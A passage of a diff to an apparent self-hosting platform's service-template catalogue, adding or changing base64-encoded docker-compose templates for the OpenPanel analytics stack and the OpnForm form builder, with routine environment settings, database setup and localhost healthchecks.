dlX29ic2VydmVyX3dhaXRfdGltZT5cbiAgICA8IS0tIE5vdCB1c2VkIGFueW1vcmUsIGJ1dCBrZXB0IGZvciBiYWNrd2FyZHMgY29tcGF0aWJpbGl0eSAtLT5cbiAgICA8bWFjcm9zPlxuICAgICAgICA8c2hhcmQ+MTwvc2hhcmQ+XG4gICAgICAgIDxyZXBsaWNhPnJlcGxpY2ExPC9yZXBsaWNhPlxuICAgICAgICA8Y2x1c3Rlcj5vcGVucGFuZWxfY2x1c3RlcjwvY2x1c3Rlcj5cbiAgICA8L21hY3Jvcz5cbjwvY2xpY2tob3VzZT4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2NsaWNraG91c2UtdXNlci1jb25maWcueG1sCiAgICAgICAgdGFyZ2V0OiAvZXRjL2NsaWNraG91c2Utc2VydmVyL3VzZXJzLmQvb3AtdXNlci1jb25maWcueG1sCiAgICAgICAgcmVhZF9vbmx5OiB0cnVlCiAgICAgICAgY29udGVudDogIjxjbGlja2hvdXNlPlxuICAgIDxwcm9maWxlcz5cbiAgICAgICAgPGRlZmF1bHQ+XG4gICAgICAgICAgICA8bG9nX3F1ZXJpZXM+MDwvbG9nX3F1ZXJpZXM+XG4gICAgICAgICAgICA8bG9nX3F1ZXJ5X3RocmVhZHM+MDwvbG9nX3F1ZXJ5X3RocmVhZHM+XG4gICAgICAgIDwvZGVmYXVsdD5cbiAgICA8L3Byb2ZpbGVzPlxuPC9jbGlja2hvdXNlPlxuIgogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi9pbml0LWRiLnNoCiAgICAgICAgdGFyZ2V0OiAvZG9ja2VyLWVudHJ5cG9pbnQtaW5pdGRiLmQvaW5pdC1kYi5zaAogICAgICAgIGNvbnRlbnQ6ICIjIS9iaW4vc2hcbnNldCAtZVxuXG5jbGlja2hvdXNlIGNsaWVudCAtbiA8PC1FT1NRTFxuICBDUkVBVEUgREFUQUJBU0UgSUYgTk9UIEVYSVNUUyBvcGVucGFuZWw7XG5FT1NRTCIKICAgIHVsaW1pdHM6CiAgICAgIG5vZmlsZToKICAgICAgICBzb2Z0OiAyNjIxNDQKICAgICAgICBoYXJkOiAyNjIxNDQKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnY2xpY2tob3VzZS1jbGllbnQgLS1xdWVyeSAiU0VMRUNUIDEiJwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDUK", + "compose": "c2VydmljZXM6CiAgb3BlbnBhbmVsLWRhc2hib2FyZDoKICAgIGltYWdlOiAnbGluZGVzdmFyZC9vcGVucGFuZWwtZGFzaGJvYXJkOmxhdGVzdCcKICAgIGVudmlyb25tZW50OgogICAgICAtIE5PREVfRU5WPXByb2R1Y3Rpb24KICAgICAgLSBORVhUX1BVQkxJQ19TRUxGX0hPU1RFRD10cnVlCiAgICAgIC0gU0VSVklDRV9GUUROX09QREFTSEJPQVJEXzMwMDAKICAgICAgLSAnTkVYVF9QVUJMSUNfQVBJX1VSTD0ke1NFUlZJQ0VfRlFETl9PUEFQSX0nCiAgICAgIC0gJ05FWFRfUFVCTElDX0RBU0hCT0FSRF9VUkw9JHtTRVJWSUNFX0ZRRE5fT1BEQVNIQk9BUkR9JwogICAgICAtICdEQVRBQkFTRV9VUkw9cG9zdGdyZXM6Ly8ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU306JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUBwb3N0Z3Jlczo1NDMyLyR7T1BFTlBBTkVMX1BPU1RHUkVTX0RCOi1vcGVucGFuZWwtZGJ9P3NjaGVtYT1wdWJsaWMnCiAgICAgIC0gJ1JFRElTX1VSTD1yZWRpczovL2RlZmF1bHQ6JHtTRVJWSUNFX1BBU1NXT1JEX1JFRElTfUByZWRpczo2Mzc5JwogICAgICAtICdDTElDS0hPVVNFX1VSTD1odHRwOi8vY2xpY2tob3VzZTo4MTIzL29wZW5wYW5lbCcKICAgIGRlcGVuZHNfb246CiAgICAgIG9wZW5wYW5lbC1hcGk6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgb3BlbnBhbmVsLXdvcmtlcjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICByZWRpczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBjbGlja2hvdXNlOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ2N1cmwgLWYgaHR0cDovL2xvY2FsaG9zdDozMDAwL2FwaS9oZWFsdGhjaGVjayB8fCBleGl0IDEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogNQogICAgICBzdGFydF9wZXJpb2Q6IDE1cwogIG9wZW5wYW5lbC1hcGk6CiAgICBpbWFnZTogJ2xpbmRlc3ZhcmQvb3BlbnBhbmVsLWFwaTpsYXRlc3QnCiAgICBjb21tYW5kOiAic2ggLWMgXCJcbiAgZWNobyAnUnVubmluZyBtaWdyYXRpb25zLi4uJ1xuICBDST10cnVlIHBucG0gLXIgcnVuIG1pZ3JhdGU6ZGVwbG95XG5cbiAgcG5wbSBzdGFydFxuXCJcbiIKICAgIGVudmlyb25tZW50OgogICAgICAtIE5PREVfRU5WPXByb2R1Y3Rpb24KICAgICAgLSBORVhUX1BVQkxJQ19TRUxGX0hPU1RFRD10cnVlCiAgICAgIC0gU0VSVklDRV9GUUROX09QQVBJCiAgICAgIC0gJ05FWFRfUFVCTElDX0FQSV9VUkw9JHtTRVJWSUNFX0ZRRE5fT1BBUEl9JwogICAgICAtICdORVhUX1BVQkxJQ19EQVNIQk9BUkRfVVJMPSR7U0VSVklDRV9GUUROX09QREFTSEJPQVJEfScKICAgICAgLSAnREFUQUJBU0VfVVJMPXBvc3RncmVzOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AcG9zdGdyZXM6NTQzMi8ke09QRU5QQU5FTF9QT1NUR1JFU19EQjotb3BlbnBhbmVsLWRifT9zY2hlbWE9cHVibGljJwogICAgICAtICdEQVRBQkFTRV9VUkxfRElSRUNUPXBvc3RncmVzOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AcG9zdGdyZXM6NTQzMi8ke09QRU5QQU5FTF9QT1NUR1JFU19EQjotb3BlbnBhbmVsLWRifT9zY2hlbWE9cHVibGljJwogICAgICAtICdSRURJU19VUkw9cmVkaXM6Ly9kZWZhdWx0OiR7U0VSVklDRV9QQVNTV09SRF9SRURJU31AcmVkaXM6NjM3OScKICAgICAgLSAnQ0xJQ0tIT1VTRV9VUkw9aHR0cDovL2NsaWNraG91c2U6ODEyMy9vcGVucGFuZWwnCiAgICAgIC0gJ0NPT0tJRV9TRUNSRVQ9JHtTRVJWSUNFX0JBU0U2NF9DT09LSUVTRUNSRVR9JwogICAgICAtICdBTExPV19SRUdJU1RSQVRJT049JHtPUEVOUEFORUxfQUxMT1dfUkVHSVNUUkFUSU9OOi1mYWxzZX0nCiAgICAgIC0gJ0FMTE9XX0lOVklUQVRJT049JHtPUEVOUEFORUxfQUxMT1dfSU5WSVRBVElPTjotZmFsc2V9JwogICAgICAtICdFTUFJTF9TRU5ERVI9JHtPUEVOUEFORUxfRU1BSUxfU0VOREVSfScKICAgICAgLSAnUkVTRU5EX0FQSV9LRVk9JHtSRVNFTkRfQVBJX0tFWX0nCiAgICBkZXBlbmRzX29uOgogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBjbGlja2hvdXNlOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHJlZGlzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ2N1cmwgLWYgaHR0cDovL2xvY2FsaG9zdDozMDAwL2hlYWx0aGNoZWNrIHx8IGV4aXQgMScKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiA1CiAgb3BlbnBhbmVsLXdvcmtlcjoKICAgIGltYWdlOiAnbGluZGVzdmFyZC9vcGVucGFuZWwtd29ya2VyOmxhdGVzdCcKICAgIGVudmlyb25tZW50OgogICAgICAtICdESVNBQkxFX0JVTExCT0FSRD0ke0RJU0FCTEVfQlVMTEJPQVJEOi0xfScKICAgICAgLSBOT0RFX0VOVj1wcm9kdWN0aW9uCiAgICAgIC0gTkVYVF9QVUJMSUNfU0VMRl9IT1NURUQ9dHJ1ZQogICAgICAtIFNFUlZJQ0VfRlFETl9PUEJVTExCT0FSRAogICAgICAtICdORVhUX1BVQkxJQ19BUElfVVJMPSR7U0VSVklDRV9GUUROX09QQVBJfScKICAgICAgLSAnREFUQUJBU0VfVVJMPXBvc3RncmVzOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AcG9zdGdyZXM6NTQzMi8ke09QRU5QQU5FTF9QT1NUR1JFU19EQjotb3BlbnBhbmVsLWRifT9zY2hlbWE9cHVibGljJwogICAgICAtICdEQVRBQkFTRV9VUkxfRElSRUNUPXBvc3RncmVzOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AcG9zdGdyZXM6NTQzMi8ke09QRU5QQU5FTF9QT1NUR1JFU19EQjotb3BlbnBhbmVsLWRifT9zY2hlbWE9cHVibGljJwogICAgICAtICdSRURJU19VUkw9cmVkaXM6Ly9kZWZhdWx0OiR7U0VSVklDRV9QQVNTV09SRF9SRURJU31AcmVkaXM6NjM3OScKICAgICAgLSAnQ0xJQ0tIT1VTRV9VUkw9aHR0cDovL2NsaWNraG91c2U6ODEyMy9vcGVucGFuZWwnCiAgICBkZXBlbmRzX29uOgogICAgICBvcGVucGFuZWwtYXBpOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHBvc3RncmVzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHJlZGlzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIGNsaWNraG91c2U6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnY3VybCAtZiBodHRwOi8vbG9jYWxob3N0OjMwMDAvaGVhbHRoY2hlY2sgfHwgZXhpdCAxJwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDUKICAgICAgc3RhcnRfcGVyaW9kOiA1cwogIHBvc3RncmVzOgogICAgaW1hZ2U6ICdwb3N0Z3JlczoxNi1hbHBpbmUnCiAgICB2b2x1bWVzOgogICAgICAtICdvcGVucGFuZWxfcG9zdGdyZXNfZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsL2RhdGEnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUE9TVEdSRVNfREI9JHtPUEVOUEFORUxfUE9TVEdSRVNfREI6LW9wZW5wYW5lbC1kYn0nCiAgICAgIC0gJ1BPU1RHUkVTX1VTRVI9JHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiA1CiAgcmVkaXM6CiAgICBpbWFnZTogJ3JlZGlzOjcuNC1hbHBpbmUnCiAgICB2b2x1bWVzOgogICAgICAtICdvcGVucGFuZWxfcmVkaXNfZGF0YTovZGF0YScKICAgIGVudmlyb25tZW50OgogICAgICAtICdSRURJU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9JwogICAgY29tbWFuZDogJ3JlZGlzLXNlcnZlciAtLXJlcXVpcmVwYXNzICR7U0VSVklDRV9QQVNTV09SRF9SRURJU30gLS1tYXhtZW1vcnktcG9saWN5IG5vZXZpY3Rpb24nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gcmVkaXMtY2xpCiAgICAgICAgLSAnLWEnCiAgICAgICAgLSAnJHtTRVJWSUNFX1BBU1NXT1JEX1JFRElTfScKICAgICAgICAtIHBpbmcKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiA1CiAgY2xpY2tob3VzZToKICAgIGltYWdlOiAnY2xpY2tob3VzZS9jbGlja2hvdXNlLXNlcnZlcjoyNC4zLjItYWxwaW5lJwogICAgdm9sdW1lczoKICAgICAgLSAnb3BlbnBhbmVsX2NsaWNraG91c2VfZGF0YTovdmFyL2xpYi9jbGlja2hvdXNlJwogICAgICAtICdvcGVucGFuZWxfY2xpY2tob3VzZV9sb2dzOi92YXIvbG9nL2NsaWNraG91c2Utc2VydmVyJwogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi9jbGlja2hvdXNlLWNvbmZpZy54bWwKICAgICAgICB0YXJnZXQ6IC9ldGMvY2xpY2tob3VzZS1zZXJ2ZXIvY29uZmlnLmQvb3AtY29uZmlnLnhtbAogICAgICAgIHJlYWRfb25seTogdHJ1ZQogICAgICAgIGNvbnRlbnQ6ICI8Y2xpY2tob3VzZT5cbiAgICA8bG9nZ2VyPlxuICAgICAgICA8bGV2ZWw+d2FybmluZzwvbGV2ZWw+XG4gICAgICAgIDxjb25zb2xlPnRydWU8L2NvbnNvbGU+XG4gICAgPC9sb2dnZXI+XG4gICAgPGtlZXBfYWxpdmVfdGltZW91dD4xMDwva2VlcF9hbGl2ZV90aW1lb3V0PlxuICAgIDwhLS0gU3RvcCBhbGwgdGhlIHVubmVjZXNzYXJ5IGxvZ2dpbmcgLS0+XG4gICAgPHF1ZXJ5X3RocmVhZF9sb2cgcmVtb3ZlPVwicmVtb3ZlXCIvPlxuICAgIDxxdWVyeV9sb2cgcmVtb3ZlPVwicmVtb3ZlXCIvPlxuICAgIDx0ZXh0X2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPHRyYWNlX2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPG1ldHJpY19sb2cgcmVtb3ZlPVwicmVtb3ZlXCIvPlxuICAgIDxhc3luY2hyb25vdXNfbWV0cmljX2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPHNlc3Npb25fbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8cGFydF9sb2cgcmVtb3ZlPVwicmVtb3ZlXCIvPlxuICAgIDxsaXN0ZW5faG9zdD4wLjAuMC4wPC9saXN0ZW5faG9zdD5cbiAgICA8aW50ZXJzZXJ2ZXJfbGlzdGVuX2hvc3Q+MC4wLjAuMDwvaW50ZXJzZXJ2ZXJfbGlzdGVuX2hvc3Q+XG4gICAgPGludGVyc2VydmVyX2h0dHBfaG9zdD5vcGNoPC9pbnRlcnNlcnZlcl9odHRwX2hvc3Q+XG4gICAgPCEtLSBEaXNhYmxlIGNncm91cCBtZW1vcnkgb2JzZXJ2ZXIgLS0+XG4gICAgPGNncm91cHNfbWVtb3J5X3VzYWdlX29ic2VydmVyX3dhaXRfdGltZT4wPC9jZ3JvdXBzX21lbW9yeV91c2FnZV9vYnNlcnZlcl93YWl0X3RpbWU+XG4gICAgPCEtLSBOb3QgdXNlZCBhbnltb3JlLCBidXQga2VwdCBmb3IgYmFja3dhcmRzIGNvbXBhdGliaWxpdHkgLS0+XG4gICAgPG1hY3Jvcz5cbiAgICAgICAgPHNoYXJkPjE8L3NoYXJkPlxuICAgICAgICA8cmVwbGljYT5yZXBsaWNhMTwvcmVwbGljYT5cbiAgICAgICAgPGNsdXN0ZXI+b3BlbnBhbmVsX2NsdXN0ZXI8L2NsdXN0ZXI+XG4gICAgPC9tYWNyb3M+XG48L2NsaWNraG91c2U+IgogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi9jbGlja2hvdXNlLXVzZXItY29uZmlnLnhtbAogICAgICAgIHRhcmdldDogL2V0Yy9jbGlja2hvdXNlLXNlcnZlci91c2Vycy5kL29wLXVzZXItY29uZmlnLnhtbAogICAgICAgIHJlYWRfb25seTogdHJ1ZQogICAgICAgIGNvbnRlbnQ6ICI8Y2xpY2tob3VzZT5cbiAgICA8cHJvZmlsZXM+XG4gICAgICAgIDxkZWZhdWx0PlxuICAgICAgICAgICAgPGxvZ19xdWVyaWVzPjA8L2xvZ19xdWVyaWVzPlxuICAgICAgICAgICAgPGxvZ19xdWVyeV90aHJlYWRzPjA8L2xvZ19xdWVyeV90aHJlYWRzPlxuICAgICAgICA8L2RlZmF1bHQ+XG4gICAgPC9wcm9maWxlcz5cbjwvY2xpY2tob3VzZT5cbiIKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vaW5pdC1kYi5zaAogICAgICAgIHRhcmdldDogL2RvY2tlci1lbnRyeXBvaW50LWluaXRkYi5kL2luaXQtZGIuc2gKICAgICAgICBjb250ZW50OiAiIyEvYmluL3NoXG5zZXQgLWVcblxuY2xpY2tob3VzZSBjbGllbnQgLW4gPDwtRU9TUUxcbiAgQ1JFQVRFIERBVEFCQVNFIElGIE5PVCBFWElTVFMgb3BlbnBhbmVsO1xuRU9TUUwiCiAgICB1bGltaXRzOgogICAgICBub2ZpbGU6CiAgICAgICAgc29mdDogMjYyMTQ0CiAgICAgICAgaGFyZDogMjYyMTQ0CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ2NsaWNraG91c2UtY2xpZW50IC0tcXVlcnkgIlNFTEVDVCAxIicKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiA1Cg==", "tags": [ "analytics", "insights", @@ -3054,6 +3068,26 @@ "minversion": "0.0.0", "port": "3000" }, + "opnform": { + "documentation": "https://docs.opnform.com/introduction?utm_source=coolify.io", + "slogan": "OpnForm is an open-source form builder that lets you create beautiful forms and share them anywhere. It's super fast, you don't need to know how to code", + "compose": "eC1zaGFyZWQtZW52OgogIEFQUF9OQU1FOiBPcG5Gb3JtCiAgQVBQX0VOVjogcHJvZHVjdGlvbgogIEFQUF9LRVk6ICcke1NFUlZJQ0VfQkFTRTY0X0FQSUtFWX0nCiAgQVBQX0RFQlVHOiAnJHtBUFBfREVCVUc6LWZhbHNlfScKICBBUFBfVVJMOiAnJHtTRVJWSUNFX0ZRRE5fTkdJTlh9JwogIExPR19DSEFOTkVMOiBlcnJvcmxvZwogIExPR19MRVZFTDogJyR7TE9HX0xFVkVMOi1kZWJ1Z30nCiAgRklMRVNZU1RFTV9EUklWRVI6ICcke0ZJTEVTWVNURU1fRFJJVkVSOi1sb2NhbH0nCiAgTE9DQUxfRklMRVNZU1RFTV9WSVNJQklMSVRZOiBwdWJsaWMKICBDQUNIRV9EUklWRVI6IHJlZGlzCiAgUVVFVUVfQ09OTkVDVElPTjogcmVkaXMKICBTRVNTSU9OX0RSSVZFUjogcmVkaXMKICBTRVNTSU9OX0xJRkVUSU1FOiAxMjAKICBNQUlMX01BSUxFUjogJyR7TUFJTF9NQUlMRVI6LWxvZ30nCiAgTUFJTF9IT1NUOiAnJHtNQUlMX0hPU1R9JwogIE1BSUxfUE9SVDogJyR7TUFJTF9QT1JUfScKICBNQUlMX1VTRVJOQU1FOiAnJHtNQUlMX1VTRVJOQU1FOi15b3VyQGVtYWlsLmNvbX0nCiAgTUFJTF9QQVNTV09SRDogJyR7TUFJTF9QQVNTV09SRH0nCiAgTUFJTF9FTkNSWVBUSU9OOiAnJHtNQUlMX0VOQ1JZUFRJT059JwogIE1BSUxfRlJPTV9BRERSRVNTOiAnJHtNQUlMX0ZST01fQUREUkVTUzoteW91ckBlbWFpbC5jb219JwogIE1BSUxfRlJPTV9OQU1FOiAnJHtNQUlMX0ZST01fTkFNRTotT3BuRm9ybX0nCiAgQVdTX0FDQ0VTU19LRVlfSUQ6ICcke0FXU19BQ0NFU1NfS0VZX0lEfScKICBBV1NfU0VDUkVUX0FDQ0VTU19LRVk6ICcke0FXU19TRUNSRVRfQUNDRVNTX0tFWX0nCiAgQVdTX0RFRkFVTFRfUkVHSU9OOiAnJHtBV1NfREVGQVVMVF9SRUdJT046LXVzLWVhc3QtMX0nCiAgQVdTX0JVQ0tFVDogJyR7QVdTX0JVQ0tFVH0nCiAgT1BFTl9BSV9BUElfS0VZOiAnJHtPUEVOX0FJX0FQSV9LRVl9JwogIFRFTEVHUkFNX0JPVF9JRDogJyR7VEVMRUdSQU1fQk9UX0lEfScKICBURUxFR1JBTV9CT1RfVE9LRU46ICcke1RFTEVHUkFNX0JPVF9UT0tFTn0nCiAgUkVESVNfSE9TVDogcmVkaXMKICBSRURJU19QQVNTV09SRDogJyR7U0VSVklDRV9QQVNTV09SRF82NF9SRURJU30nCiAgREJfSE9TVDogcG9zdGdyZXNxbAogIERCX0RBVEFCQVNFOiAnJHtQT1NUR1JFU1FMX0RBVEFCQVNFOi1vcG5mb3JtfScKICBEQl9VU0VSTkFNRTogJyR7U0VSVklDRV9VU0VSX1BPU1RHUkVTUUx9JwogIERCX1BBU1NXT1JEOiAnJHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTUUx9JwogIERCX0NPTk5FQ1RJT046IHBnc3FsCiAgUEhQX01FTU9SWV9MSU1JVDogMUcKICBQSFBfTUFYX0VYRUNVVElPTl9USU1FOiAnNjAwJwogIFBIUF9VUExPQURfTUFYX0ZJTEVTSVpFOiA2NE0KICBQSFBfUE9TVF9NQVhfU0laRTogNjRNCnNlcnZpY2VzOgogIG9wbmZvcm0tYXBpOgogICAgaW1hZ2U6ICdqaHVtYW5qL29wbmZvcm0tYXBpOjEuMTIuMScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2FwaS1zdG9yYWdlOi91c3Ivc2hhcmUvbmdpbngvaHRtbC9zdG9yYWdlJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIEFQUF9OQU1FOiBPcG5Gb3JtCiAgICAgIEFQUF9FTlY6IHByb2R1Y3Rpb24KICAgICAgQVBQX0tFWTogJyR7U0VSVklDRV9CQVNFNjRfQVBJS0VZfScKICAgICAgQVBQX0RFQlVHOiAnJHtBUFBfREVCVUc6LWZhbHNlfScKICAgICAgQVBQX1VSTDogJyR7U0VSVklDRV9GUUROX05HSU5YfScKICAgICAgTE9HX0NIQU5ORUw6IGVycm9ybG9nCiAgICAgIExPR19MRVZFTDogJyR7TE9HX0xFVkVMOi1kZWJ1Z30nCiAgICAgIEZJTEVTWVNURU1fRFJJVkVSOiAnJHtGSUxFU1lTVEVNX0RSSVZFUjotbG9jYWx9JwogICAgICBMT0NBTF9GSUxFU1lTVEVNX1ZJU0lCSUxJVFk6IHB1YmxpYwogICAgICBDQUNIRV9EUklWRVI6IHJlZGlzCiAgICAgIFFVRVVFX0NPTk5FQ1RJT046IHJlZGlzCiAgICAgIFNFU1NJT05fRFJJVkVSOiByZWRpcwogICAgICBTRVNTSU9OX0xJRkVUSU1FOiAxMjAKICAgICAgTUFJTF9NQUlMRVI6ICcke01BSUxfTUFJTEVSOi1sb2d9JwogICAgICBNQUlMX0hPU1Q6ICcke01BSUxfSE9TVH0nCiAgICAgIE1BSUxfUE9SVDogJyR7TUFJTF9QT1JUfScKICAgICAgTUFJTF9VU0VSTkFNRTogJyR7TUFJTF9VU0VSTkFNRToteW91ckBlbWFpbC5jb219JwogICAgICBNQUlMX1BBU1NXT1JEOiAnJHtNQUlMX1BBU1NXT1JEfScKICAgICAgTUFJTF9FTkNSWVBUSU9OOiAnJHtNQUlMX0VOQ1JZUFRJT059JwogICAgICBNQUlMX0ZST01fQUREUkVTUzogJyR7TUFJTF9GUk9NX0FERFJFU1M6LXlvdXJAZW1haWwuY29tfScKICAgICAgTUFJTF9GUk9NX05BTUU6ICcke01BSUxfRlJPTV9OQU1FOi1PcG5Gb3JtfScKICAgICAgQVdTX0FDQ0VTU19LRVlfSUQ6ICcke0FXU19BQ0NFU1NfS0VZX0lEfScKICAgICAgQVdTX1NFQ1JFVF9BQ0NFU1NfS0VZOiAnJHtBV1NfU0VDUkVUX0FDQ0VTU19LRVl9JwogICAgICBBV1NfREVGQVVMVF9SRUdJT046ICcke0FXU19ERUZBVUxUX1JFR0lPTjotdXMtZWFzdC0xfScKICAgICAgQVdTX0JVQ0tFVDogJyR7QVdTX0JVQ0tFVH0nCiAgICAgIE9QRU5fQUlfQVBJX0tFWTogJyR7T1BFTl9BSV9BUElfS0VZfScKICAgICAgVEVMRUdSQU1fQk9UX0lEOiAnJHtURUxFR1JBTV9CT1RfSUR9JwogICAgICBURUxFR1JBTV9CT1RfVE9LRU46ICcke1RFTEVHUkFNX0JPVF9UT0tFTn0nCiAgICAgIFJFRElTX0hPU1Q6IHJlZGlzCiAgICAgIFJFRElTX1BBU1NXT1JEOiAnJHtTRVJWSUNFX1BBU1NXT1JEXzY0X1JFRElTfScKICAgICAgREJfSE9TVDogcG9zdGdyZXNxbAogICAgICBEQl9EQVRBQkFTRTogJyR7UE9TVEdSRVNRTF9EQVRBQkFTRTotb3BuZm9ybX0nCiAgICAgIERCX1VTRVJOQU1FOiAnJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVNRTH0nCiAgICAgIERCX1BBU1NXT1JEOiAnJHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTUUx9JwogICAgICBEQl9DT05ORUNUSU9OOiBwZ3NxbAogICAgICBQSFBfTUVNT1JZX0xJTUlUOiAxRwogICAgICBQSFBfTUFYX0VYRUNVVElPTl9USU1FOiAnNjAwJwogICAgICBQSFBfVVBMT0FEX01BWF9GSUxFU0laRTogNjRNCiAgICAgIFBIUF9QT1NUX01BWF9TSVpFOiA2NE0KICAgICAgSldUX1RUTDogJyR7SldUX1RUTDotMTQ0MH0nCiAgICAgIEpXVF9TRUNSRVQ6ICcke1NFUlZJQ0VfUEFTU1dPUkRfSldUU0VDUkVUfScKICAgICAgSldUX1NLSVBfSVBfVUFfVkFMSURBVElPTjogJyR7SldUX1NLSVBfSVBfVUFfVkFMSURBVElPTjotdHJ1ZX0nCiAgICAgIEhfQ0FQVENIQV9TSVRFX0tFWTogJyR7SF9DQVBUQ0hBX1NJVEVfS0VZfScKICAgICAgSF9DQVBUQ0hBX1NFQ1JFVF9LRVk6ICcke0hfQ0FQVENIQV9TRUNSRVRfS0VZfScKICAgICAgUkVfQ0FQVENIQV9TSVRFX0tFWTogJyR7UkVfQ0FQVENIQV9TSVRFX0tFWX0nCiAgICAgIFJFX0NBUFRDSEFfU0VDUkVUX0tFWTogJyR7UkVfQ0FQVENIQV9TRUNSRVRfS0VZfScKICAgICAgU0hPV19PRkZJQ0lBTF9URU1QTEFURVM6ICcke1NIT1dfT0ZGSUNJQUxfVEVNUExBVEVTOi10cnVlfScKICAgIGRlcGVuZHNfb246CiAgICAgIHBvc3RncmVzcWw6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcmVkaXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncGhwIC91c3Ivc2hhcmUvbmdpbngvaHRtbC9hcnRpc2FuIGFib3V0IHx8IGV4aXQgMScKICAgICAgaW50ZXJ2YWw6IDMwcwogICAgICB0aW1lb3V0OiAxNXMKICAgICAgcmV0cmllczogMwogICAgICBzdGFydF9wZXJpb2Q6IDYwcwogIGFwaS13b3JrZXI6CiAgICBpbWFnZTogJ2podW1hbmovb3BuZm9ybS1hcGk6MS4xMi4xJwogICAgdm9sdW1lczoKICAgICAgLSAnYXBpLXN0b3JhZ2U6L3Vzci9zaGFyZS9uZ2lueC9odG1sL3N0b3JhZ2UnCiAgICBlbnZpcm9ubWVudDoKICAgICAgQVBQX05BTUU6IE9wbkZvcm0KICAgICAgQVBQX0VOVjogcHJvZHVjdGlvbgogICAgICBBUFBfS0VZO